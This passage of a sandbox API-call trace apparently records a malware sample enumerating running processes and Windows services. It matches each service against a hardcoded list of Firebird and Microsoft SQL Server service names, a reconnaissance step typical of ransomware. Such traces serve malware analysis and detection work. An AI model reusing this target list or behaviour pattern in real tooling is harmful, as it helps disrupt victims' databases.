(lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0188.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0188.451] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0188.451] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0188.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0188.451] lstrlenW (lpString="Spooler") returned 7 [0188.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0188.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0188.451] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0188.451] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0188.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0188.451] lstrlenW (lpString="StateRepository") returned 15 [0188.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0188.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0188.451] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0188.451] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0188.451] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0188.451] lstrlenW (lpString="SysMain") returned 7 [0188.451] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0188.451] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0188.452] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0188.452] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0188.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0188.452] lstrlenW (lpString="SystemEventsBroker") returned 18 [0188.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0188.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0188.452] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0188.452] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0188.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0188.452] lstrlenW (lpString="Themes") returned 6 [0188.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0188.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0188.452] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0188.452] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0188.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0188.453] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0188.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0188.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0188.453] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0188.453] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0188.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x334 [0188.457] Process32FirstW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0188.457] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0188.458] lstrlenW (lpString="System") returned 6 [0188.458] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0188.459] lstrlenW (lpString="smss.exe") returned 8 [0188.459] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.460] lstrlenW (lpString="csrss.exe") returned 9 [0188.460] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.461] lstrlenW (lpString="wininit.exe") returned 11 [0188.461] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.461] lstrlenW (lpString="csrss.exe") returned 9 [0188.461] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.462] lstrlenW (lpString="winlogon.exe") returned 12 [0188.462] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.463] lstrlenW (lpString="services.exe") returned 12 [0188.463] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.464] lstrlenW (lpString="lsass.exe") returned 9 [0188.464] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0188.465] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0188.465] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0188.465] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0188.465] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.466] lstrlenW (lpString="svchost.exe") returned 11 [0188.466] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.467] lstrlenW (lpString="svchost.exe") returned 11 [0188.467] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.468] lstrlenW (lpString="dwm.exe") returned 7 [0188.468] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.468] lstrlenW (lpString="svchost.exe") returned 11 [0188.468] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.470] lstrlenW (lpString="svchost.exe") returned 11 [0188.470] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.470] lstrlenW (lpString="svchost.exe") returned 11 [0188.470] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.471] lstrlenW (lpString="svchost.exe") returned 11 [0188.471] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.472] lstrlenW (lpString="svchost.exe") returned 11 [0188.472] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.473] lstrlenW (lpString="svchost.exe") returned 11 [0188.473] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.474] lstrlenW (lpString="svchost.exe") returned 11 [0188.474] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.474] lstrlenW (lpString="svchost.exe") returned 11 [0188.474] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.475] lstrlenW (lpString="svchost.exe") returned 11 [0188.475] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.476] lstrlenW (lpString="svchost.exe") returned 11 [0188.476] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.477] lstrlenW (lpString="spoolsv.exe") returned 11 [0188.477] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.477] lstrlenW (lpString="svchost.exe") returned 11 [0188.478] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.478] lstrlenW (lpString="audiodg.exe") returned 11 [0188.478] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0188.479] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0188.479] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0188.480] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0188.480] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0188.481] lstrlenW (lpString="Memory Compression") returned 18 [0188.481] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0188.481] lstrlenW (lpString="sihost.exe") returned 10 [0188.481] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.482] lstrlenW (lpString="svchost.exe") returned 11 [0188.482] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0188.483] lstrlenW (lpString="msoia.exe") returned 9 [0188.483] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0188.484] lstrlenW (lpString="taskhostw.exe") returned 13 [0188.484] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0188.485] lstrlenW (lpString="explorer.exe") returned 12 [0188.485] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0188.485] lstrlenW (lpString="SearchUI.exe") returned 12 [0188.485] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0188.486] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0188.486] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0188.487] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0188.487] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0188.488] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0188.488] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0188.489] lstrlenW (lpString="hgaibc.exe") returned 10 [0188.489] Process32NextW (in: hSnapshot=0x334, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 0 [0188.489] CloseHandle (hObject=0x334) returned 1 [0188.489] Sleep (dwMilliseconds=0x1f4) [0188.999] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x6bf038 [0189.000] EnumServicesStatusExW (in: hSCManager=0x6bf038, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 0 [0189.000] GetLastError () returned 0xea [0189.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1c30) returned 0x6d87a0 [0189.000] EnumServicesStatusExW (in: hSCManager=0x6bf038, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6d87a0, cbBufSize=0x1c30, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6d87a0, pcbBytesNeeded=0x245ff3c, lpServicesReturned=0x245ff54, lpResumeHandle=0x0) returned 1 [0189.001] CloseServiceHandle (hSCObject=0x6bf038) returned 1 [0189.001] lstrlenW (lpString="Appinfo") returned 7 [0189.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0189.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0189.001] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0189.001] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0189.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0189.001] lstrlenW (lpString="AppXSvc") returned 7 [0189.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0189.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0189.001] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0189.001] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0189.001] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0189.001] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0189.001] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0189.001] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0189.001] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0189.001] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0189.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0189.002] lstrlenW (lpString="Audiosrv") returned 8 [0189.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0189.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0189.002] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0189.002] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0189.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0189.002] lstrlenW (lpString="BFE") returned 3 [0189.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0189.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0189.002] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0189.002] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0189.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0189.002] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0189.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0189.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0189.002] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0189.002] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0189.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0189.002] lstrlenW (lpString="CDPSvc") returned 6 [0189.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0189.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0189.002] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0189.002] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0189.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0189.002] lstrlenW (lpString="ClickToRunSvc") returned 13 [0189.002] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0189.002] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0189.002] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0189.002] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0189.002] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0189.002] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0189.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0189.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0189.003] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0189.003] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0189.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0189.003] lstrlenW (lpString="CryptSvc") returned 8 [0189.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0189.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0189.003] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0189.003] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0189.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0189.003] lstrlenW (lpString="DcomLaunch") returned 10 [0189.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0189.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0189.003] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0189.003] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0189.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0189.003] lstrlenW (lpString="DeviceAssociationService") returned 24 [0189.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0189.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0189.003] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0189.003] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0189.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0189.003] lstrlenW (lpString="Dhcp") returned 4 [0189.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0189.003] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0189.003] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0189.003] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0189.003] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0189.003] lstrlenW (lpString="Dnscache") returned 8 [0189.003] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0189.004] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0189.004] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0189.004] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0189.004] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0189.004] lstrlenW (lpString="DPS") returned 3 [0189.004] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0189.004] lstrcmpiW 